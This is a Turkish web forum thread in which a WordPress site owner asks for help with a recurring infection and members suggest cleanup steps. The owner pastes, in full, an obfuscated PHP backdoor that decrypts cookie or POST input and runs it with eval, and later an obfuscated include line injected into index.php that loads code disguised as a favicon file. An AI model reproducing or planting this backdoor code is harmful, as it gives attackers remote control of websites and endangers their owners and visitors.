lostyazilim
tr.link

Wordpress Virüs Problemi

8 Mesajlar 1.535 Okunma
acebozum
tr.link

mertcanfirat mertcanfirat Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 08.12.2013
  • Yaş/Cinsiyet 28 / E
  • Meslek Web Tasarım
  • Konum İstanbul Avrupa
  • Ad Soyad M** F**
  • Mesajlar 784
  • Beğeniler 128 / 137
  • Ticaret 48, (%100)
Arkadaşlar işin içinden çıkamadım. Sizden destek isteyeyim. Sitelerimde bir virüs problemi var. Aynı hostingi kullandığım için tüm sitelerime bulaşmış durumda. Sitelerimde 500 hatası veriyor ve index'i silip kendi kendine sahte .php uzantılı dosyalar açıyor mesela user.php gibi

Şu şekilde de dosyalar oluşturuyor. Bu sorun nasıl çözülür?:mad:
SimplePie/Net/exuttmfm.php
wp-includes/customize/becabcjv.php

Oluşturulan sayfalardaki kodlar

$kjpiew = '1cel5x2_k\'Ha-89*4m#vfi7udtbgny6rspo';$lylbxnp = Array();$lylbxnp[] = $kjpiew[13].$kjpiew[4].$kjpiew[4].$kjpiew[4].$kjpiew[26].$kjpiew[14].$kjpiew[22].$kjpiew[6].$kjpiew[12].$kjpiew[26].$kjpiew[0].$kjpiew[2].$kjpiew[13].$kjpiew[12].$kjpiew[16].$kjpiew[14].$kjpiew[4].$kjpiew[22].$kjpiew[12].$kjpiew[11].$kjpiew[20].$kjpiew[26].$kjpiew[20].$kjpiew[12].$kjpiew[30].$kjpiew[6].$kjpiew[2].$kjpiew[20].$kjpiew[13].$kjpiew[0].$kjpiew[13].$kjpiew[24].$kjpiew[11].$kjpiew[26].$kjpiew[2].$kjpiew[22];$lylbxnp[] = $kjpiew[10].$kjpiew[15];$lylbxnp[] = $kjpiew[18];$lylbxnp[] = $kjpiew[1].$kjpiew[34].$kjpiew[23].$kjpiew[28].$kjpiew[25];$lylbxnp[] = $kjpiew[32].$kjpiew[25].$kjpiew[31].$kjpiew[7].$kjpiew[31].$kjpiew[2].$kjpiew[33].$kjpiew[2].$kjpiew[11].$kjpiew[25];$lylbxnp[] = $kjpiew[2].$kjpiew[5].$kjpiew[33].$kjpiew[3].$kjpiew[34].$kjpiew[24].$kjpiew[2];$lylbxnp[] = $kjpiew[32].$kjpiew[23].$kjpiew[26].$kjpiew[32].$kjpiew[25].$kjpiew[31];$lylbxnp[] = $kjpiew[11].$kjpiew[31].$kjpiew[31].$kjpiew[11].$kjpiew[29].$kjpiew[7].$kjpiew[17].$kjpiew[2].$kjpiew[31].$kjpiew[27].$kjpiew[2];$lylbxnp[] = $kjpiew[32].$kjpiew[25].$kjpiew[31].$kjpiew[3].$kjpiew[2].$kjpiew[28];$lylbxnp[] = $kjpiew[33].$kjpiew[11].$kjpiew[1].$kjpiew[8];foreach ($lylbxnp[7]($_COOKIE, $_POST) as $buyua => $jqwvmmj){function eyjzwlt($lylbxnp, $buyua, $wnubev){return $lylbxnp[6]($lylbxnp[4]($buyua . $lylbxnp[0], ($wnubev / $lylbxnp[8]($buyua)) + 1), 0, $wnubev);}function dqurme($lylbxnp, $uhymdu){return @$lylbxnp[9]($lylbxnp[1], $uhymdu);}function sykzp($lylbxnp, $uhymdu){$zdjmoc = $lylbxnp[3]($uhymdu) % 3;if (!$zdjmoc) {eval($uhymdu[1]($uhymdu[2]));exit();}}$jqwvmmj = dqurme($lylbxnp, $jqwvmmj);sykzp($lylbxnp, $lylbxnp[5]($lylbxnp[2], $jqwvmmj ^ eyjzwlt($lylbxnp, $buyua, $lylbxnp[8]($jqwvmmj))));}
 

 

elektronikssl
webimgo

BozkurtReis BozkurtReis Hello Bro Kullanıcı
  • Üyelik 05.08.2011
  • Yaş/Cinsiyet 30 / E
  • Meslek Para Yer
  • Konum Ankara
  • Ad Soyad O** B**
  • Mesajlar 1009
  • Beğeniler 176 / 201
  • Ticaret 25, (%96)
TEMA dosyalarını temizle ve wordpress dosyalarını güncelleme yapar gibi tazele ve tekrar dene yine aynısı olursa phpmyadminden kodları kontrol et
 

 

Modern ve Gelişmiş İddaa Tahmin Uygulaması Satışta !!!!

Mustafac Mustafac tarcinmedya.com Kullanıcı
  • Üyelik 22.11.2015
  • Yaş/Cinsiyet 27 / E
  • Meslek Öğrenci
  • Konum İstanbul Avrupa
  • Ad Soyad M** Ç**
  • Mesajlar 581
  • Beğeniler 186 / 191
  • Ticaret 12, (%100)
Anti Malware diye bi eklenti var , işe yarar mı bilmem.
 

 

www.tarcinmedya.com - Profesyonel Web Tasarım, Grafik Tasarım ve Sosyal Medya Pazarlama

mertcanfirat mertcanfirat Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 08.12.2013
  • Yaş/Cinsiyet 28 / E
  • Meslek Web Tasarım
  • Konum İstanbul Avrupa
  • Ad Soyad M** F**
  • Mesajlar 784
  • Beğeniler 128 / 137
  • Ticaret 48, (%100)
Kurdum ve denedim. Evet buluyor fakat 10 gün sonra bir daha temizlemek zorunda kaldım. Bir şekilde giriş yapıyorlar.
 

 

wmaraci
wmaraci

Miraz Miraz Future Kullanıcı
  • Üyelik 10.01.2014
  • Yaş/Cinsiyet 33 / E
  • Meslek Bilgisayar Mühendisi
  • Konum Diğer
  • Ad Soyad B** A**
  • Mesajlar 638
  • Beğeniler 197 / 198
  • Ticaret 18, (%100)

mertcanfirat adlı üyeden alıntı

Kurdum ve denedim. Evet buluyor fakat 10 gün sonra bir daha temizlemek zorunda kaldım. Bir şekilde giriş yapıyorlar.



Eğer temizlendiğine gerçekten inanıyorsan ve tekrarı oluyorsa,
Sunucu kaynaklı bir sorun olabilir.
Tema kodları ile alakalı bir durum olabilir.
Wordpress ile alakalı bir sorun olabilir.
Eklenti kaynaklı bir sorun olabilir.
 

 

CihatOzgen CihatOzgen Özgen Medya Kullanıcı
  • Üyelik 22.01.2018
  • Yaş/Cinsiyet 40 / E
  • Meslek Mühabir
  • Konum Antalya
  • Ad Soyad C** Ö**
  • Mesajlar 200
  • Beğeniler 63 / 66
  • Ticaret 6, (%100)
mertcanfirat
/wp-includes/post.php içerisinde daki kodları sil kodları sildikten sonra /wp-includes/wp-vcd.php klasörünün içindeki wp-vcd.php dosyasını sil. bu işlemleri yaptıktan sonra .

sorun çözülecektir
 

 

Sen Emek vereceksin ki Emeğinin Karşılığını Alacaksın

mertcanfirat mertcanfirat Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 08.12.2013
  • Yaş/Cinsiyet 28 / E
  • Meslek Web Tasarım
  • Konum İstanbul Avrupa
  • Ad Soyad M** F**
  • Mesajlar 784
  • Beğeniler 128 / 137
  • Ticaret 48, (%100)
BilgiPortaLi ilgili kodlar ve dosyalar maalesef bulunmuyor
 

 

mertcanfirat mertcanfirat Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 08.12.2013
  • Yaş/Cinsiyet 28 / E
  • Meslek Web Tasarım
  • Konum İstanbul Avrupa
  • Ad Soyad M** F**
  • Mesajlar 784
  • Beğeniler 128 / 137
  • Ticaret 48, (%100)
Kod index.php sayfasını şu hale getiriyor

/*b12fe*/

@include "\x2fhom\x65/uy\x65lik\x61v/h\x61ber\x66oks\x2ecom\x2f.we\x6cl-k\x6eown\x2ffav\x69con\x5fe03\x396a.\x69co";

/*b12fe*/



 

 

wmaraci
wmaraci
Konuyu toplam 1 kişi okuyor. (0 kullanıcı ve 1 misafir)
Site Ayarları
  • Tema Seçeneği
  • Site Sesleri
  • Bildirimler
  • Özel Mesaj Al